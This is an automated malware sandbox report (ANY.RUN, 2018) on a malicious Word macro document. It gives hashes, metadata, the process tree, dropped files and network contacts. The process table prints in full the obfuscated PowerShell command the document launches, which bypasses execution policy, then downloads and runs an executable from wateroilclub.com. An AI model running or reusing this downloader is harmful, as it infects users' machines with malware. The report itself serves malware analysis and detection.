File name: | d1d7a097ccfd2544d3d761284432da8333ed51a11fc9ed4c3c11c07c439bbf2f |
Full analysis: | https://app.any.run/tasks/de487785-8d10-4914-97ce-6417a98cbdbe |
Verdict: | Malicious activity |
Analysis date: | December 14, 2018, 09:52:30 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Little Pig, Template: Normal, Last Saved By: Windows User, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Fri Dec 14 03:47:00 2018, Last Saved Time/Date: Thu Dec 13 18:09:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | AD2C5F31E65B8710C8230067A22E8206 |
SHA1: | 660A8302E26F2DDE75C66429E8675BFB846B809F |
SHA256: | D1D7A097CCFD2544D3D761284432DA8333ED51A11FC9ED4C3C11C07C439BBF2F |
SSDEEP: | 3072:bAWAAxZStR5MBVMDk3j4CL/8orHk6mssQA8y4Q7S9JfHc+K1E7Gj0XR:bB/o5yE44O0rxnQO49v8+K2GQX |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Microsoft |
CodePage: | Unicode (UTF-8) |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2018:12:13 18:09:00 |
CreateDate: | 2018:12:14 03:47:00 |
TotalEditTime: | 3.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 4 |
LastModifiedBy: | Windows User |
Template: | Normal |
Keywords: | - |
Author: | Little Pig |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3012 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\d1d7a097ccfd2544d3d761284432da8333ed51a11fc9ed4c3c11c07c439bbf2f.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
1488 | "C:\Users\admin\AppData\Local\Temp\vuwln\opwgjqrdq.exe" $fatsdoejsmwviksttmmrmjbapm='$pa';$ixqjvizuyaxiuiadcesrs='= ''esh';$zcyiwzjgwghlkmigsgbtvmsbuou04='roce';$dgaoantyxhwyqhosetlyuthy='erh'';Set-';$uixqgmfcusnkugeqjixcdddnyo=' ''\';$inujsfenwiuxtzxxy='w-Objec';$tjoaeeehaioeatitbbie='h=(f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$enraiophlpooaowlpbmcu='vuwln'')';$oeehpaexsyfpazbenk='ss; $pat';$detuyfajximwispw='s $path;R';$ylaldgbbyuyvykwiewdkauu='(''https';$yajxauywyeffjhw='t Syst';$eumaptrpfkrzauaurkfabdqju90='t-Proces';$zdxvcaonbocnyyxcnnyxxo='emo';$xxqrgnohhhrrynvlgjxjjq3='$en';$oemlzprozqsxsukcg='cy Byp';$kscsioyrqlaauyruao='m.exe'',';$iacbqrlafwmmyqzhm=' -force;';$xkxcdlthaimrzanztkc0='ent';$fnibyyimvuuvkkxb40='ile';$ysnbkaqkpjlmmwwvrieomdretredm='ass -Scop';$utzpduyaoktitgjbddpso='env:te';$usutyzyacojzst='xe'');';$fnlunxmejjiayyztjcaruvvf74='heh ';$iesxxhhonsztacuywtb='dmy.e';$kknavgjihlypsaru='lclub';$mxldyuhvoziuoueu='ionPoli';$ujwueywoiieqxii=' -recurse';$sqztnpdiyknvruungfxfob9='Star';$zliucnthuievwlieirmnd='mp+';$stecwerctloadif='Execut';$utsrqouejuiemfez='et.Webcli';$agmrtdopxvzqncnielzsyspkba='$rb';$ivkdyxarcqpaixipvznju9=').Downl';$biraleqoosjuyugeq='://wa';$ioitprwatxacvlejgvniea='(Ne';$ubakcyieavarweoamgg='.com/f';$fjehwklrayabewoiiumclwc60='ve-Item (';$ubjjmeyyiyiwcnznfqo='ile/dw';$iobgimwmauzufmiuxobafz='e P';$ickzixqoyinkgpclbfryfo='oadF';$qixbqbfjabtfwymxebpmwpzbmhln='em.N';$icgzkxdyjqqwvuyuwxxxopse08='th); ';$qmoiaiyuyeptnwvlg='v:temp +';$cuoopnzlsrxeedfhigusez='teroi';$xmduafsdsualmleajuecjey05='ers';$npaqnzyeoeibxvuo='''\einmrm'; Invoke-Expression ($agmrtdopxvzqncnielzsyspkba+$xmduafsdsualmleajuecjey05+$fnlunxmejjiayyztjcaruvvf74+$ixqjvizuyaxiuiadcesrs+$dgaoantyxhwyqhosetlyuthy+$stecwerctloadif+$mxldyuhvoziuoueu+$oemlzprozqsxsukcg+$ysnbkaqkpjlmmwwvrieomdretredm+$iobgimwmauzufmiuxobafz+$zcyiwzjgwghlkmigsgbtvmsbuou04+$oeehpaexsyfpazbenk+$tjoaeeehaioeatitbbie+$utzpduyaoktitgjbddpso+$zliucnthuievwlieirmnd+$npaqnzyeoeibxvuo+$iesxxhhonsztacuywtb+$usutyzyacojzst+$ioitprwatxacvlejgvniea+$inujsfenwiuxtzxxy+$yajxauywyeffjhw+$qixbqbfjabtfwymxebpmwpzbmhln+$utsrqouejuiemfez+$xkxcdlthaimrzanztkc0+$ivkdyxarcqpaixipvznju9+$ickzixqoyinkgpclbfryfo+$fnibyyimvuuvkkxb40+$ylaldgbbyuyvykwiewdkauu+$biraleqoosjuyugeq+$cuoopnzlsrxeedfhigusez+$kknavgjihlypsaru+$ubakcyieavarweoamgg+$ubjjmeyyiyiwcnznfqo+$kscsioyrqlaauyruao+$fatsdoejsmwviksttmmrmjbapm+$icgzkxdyjqqwvuyuwxxxopse08+$sqztnpdiyknvruungfxfob9+$eumaptrpfkrzauaurkfabdqju90+$detuyfajximwispw+$zdxvcaonbocnyyxcnnyxxo+$fjehwklrayabewoiiumclwc60+$xxqrgnohhhrrynvlgjxjjq3+$qmoiaiyuyeptnwvlg+$uixqgmfcusnkugeqjixcdddnyo+$enraiophlpooaowlpbmcu+$ujwueywoiieqxii+$iacbqrlafwmmyqzhm); | C:\Users\admin\AppData\Local\Temp\vuwln\opwgjqrdq.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2556 | "C:\Users\admin\AppData\Local\Temp\einmrmdmy.exe" | C:\Users\admin\AppData\Local\Temp\einmrmdmy.exe | opwgjqrdq.exe | |
User: admin Company: Oscar Health Insurance Co. Integrity Level: MEDIUM Description: Reviews Signals Exit code: 3221225622 Version: 3.6.5.2 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA636.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\vuwln\Certificate.format.ps1xml | xml | |
MD5:C93A361112351B30E2C959E72789952D | SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\vuwln\Diagnostics.Format.ps1xml | text | |
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC | SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689 | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:69FC8F52154581008D9EDFF0BCB1CE6C | SHA256:0C142B55E5EF4D064F74BC3B627C07F11051DA8D47250A8CB288FCC0787B3ADD | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\vuwln\DotNetTypes.format.ps1xml | xml | |
MD5:1AB2FD4B6749AD6831C86411FDCAFB48 | SHA256:98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\vuwln\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll | executable | |
MD5:A84B6952AB6A297CCE6C085FA8AB06CB | SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D | |||
3012 | WINWORD.EXE | C:\Users\admin\Downloads\~$d7a097ccfd2544d3d761284432da8333ed51a11fc9ed4c3c11c07c439bbf2f.doc | pgc | |
MD5:77BDB8BAA77DF0A3B64CE06387255E61 | SHA256:9E67FD845F15B4F7029BE9912AD1DCB616952B3F6186185787F20E7947725A03 | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\d1d7a097ccfd2544d3d761284432da8333ed51a11fc9ed4c3c11c07c439bbf2f.doc.LNK | lnk | |
MD5:90A2F8FDBB7044B68D32B8CDD5E23D35 | SHA256:22CD5305F87574A20A307E9DE699C7ABE458ECD6D7737C0450E29FD230EF231C | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:9E8D79FE4829E8F64E4BE39C4E832C6E | SHA256:42B3287FE60F83E039C27FA4A191D6193E89DCC9DBEAC6F925DCDCC00C608DFF | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\vuwln\en-US\about_Assignment_Operators.help.txt | text | |
MD5:D2DD0C7C3423CDC0040B68FBC475428E | SHA256:4DA2F663032A15D4ECB7A6FCB6DF8D5C07D097ED8D3FA9EC054D676584C4B411 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2556 | einmrmdmy.exe | 185.244.149.78:443 | formixing.com | — | — | unknown |
1488 | opwgjqrdq.exe | 204.44.118.201:443 | wateroilclub.com | QuadraNet, Inc | US | unknown |
Domain | IP | Reputation |
---|---|---|
wateroilclub.com |
| unknown |
formixing.com |
| malicious |